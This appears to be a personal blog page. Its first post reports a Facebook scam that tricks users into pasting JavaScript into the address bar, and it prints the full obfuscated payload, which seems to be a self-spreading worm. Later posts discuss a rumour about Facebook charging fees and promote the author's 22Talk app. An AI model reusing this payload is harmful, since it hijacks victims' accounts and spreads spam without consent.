This morning I got an e-mail … the typical “[Person] suggested you like [Something]” from Facebook. Typically, this kind of stuff is SPAM; but I checked it out anyways. However, when I got to the page, I didn’t observe just spam; in fact, I observed a cunning exploitation which allows the page to run whatever Javascript code it wishes. It uses a combination of social engineering to prompt the user to perform actions to get a ‘reward’. In the process, the user inadvertently executes Javascript code in their browser.

Watch this video I recorded to see it live in action:

In essence, this is how this exploit works:

1. The user wishes to view a video, and so clicks a ‘View video’ button
2. The user is told that to watch the video, they must perform some certain actions:
   1. Click CTRL + C to copy some text
   2. Click ALT + D to select the browser’s address bar.
   3. Click CTRL + V, and then hit Enter.

And that’s it! The worm has been able to do pretty much whatever it wishes with the user’s Facebook page.

The code copied to the address bar was this:

javascript: (function () {
    a = 'app110436432334612_jop';
    b = 'app110436432334612_jode';
    ifc = 'app110436432334612_ifc';
    ifo = 'app110436432334612_ifo';
    mw = 'app110436432334612_mwrapper';
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                return r[e]
            }];
            e = function () {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    }('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);', 62, 69, '||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'), 0, {}))
})();

I’m currently trying to work out what exactly this code is doing (without executing it). I will post an update when (and if) I figure it out; feel free to comment if you get there before me. I suspect it is a worm.

Facebook are to charge £14.99 per month to access the site, in plans to be implemented July next year. Or so a Facebook group says.

Now, you would expect the ‘average’ person to see that this is a rumour. But over 800,000 members (currently growing strong at 250,000 per day) have signed up to demonstrate their naïvety. What’s more is that many people are already making plans to head back to MySpace. Maybe Facebook should put them out of their misery?

Wow.

A few days ago, I was thinking of ways to drive more traffic to 22Talk. Unlike my other websites, 22Talk’s traffic is more time dependent in that more than 1 user must be online at the same time for it to work at all (and lots more for it to work effectively).

I tried StumbleUpon Ads a few months ago, and that worked well: I managed to get around 50 simultaneous users online (for about 15 minutes, though). Unfortunately, only a small number of users from these campaigns returned to 22Talk, making the site useless again. And at $0.05 per visitor, I was unable to see how I would re-coup my costs.

But then, on Saturday, I had an epiphany: Rather than drive users to 22Talk, why not drive 22Talk to the users? And then, 22Talk on Facebook was born. It is more-or-less identical to how 22Talk worked before, but in the more social environment of Facebook. Because of Facebook’s great API, I have been able to make the site more user-orientated: If you find someone you like, you can now add them as a friend for life! (You can also go completely Anonymous, if you prefer).

The app is brand new (not in the directory yet). At the moment, you could be waiting a while for a stranger to come along — but please do wait. Please tell all of your Facebook friends to try it out, blog about this, and let’s see whether we can get enough users to get 22Talk rolling.

Merry Christmas!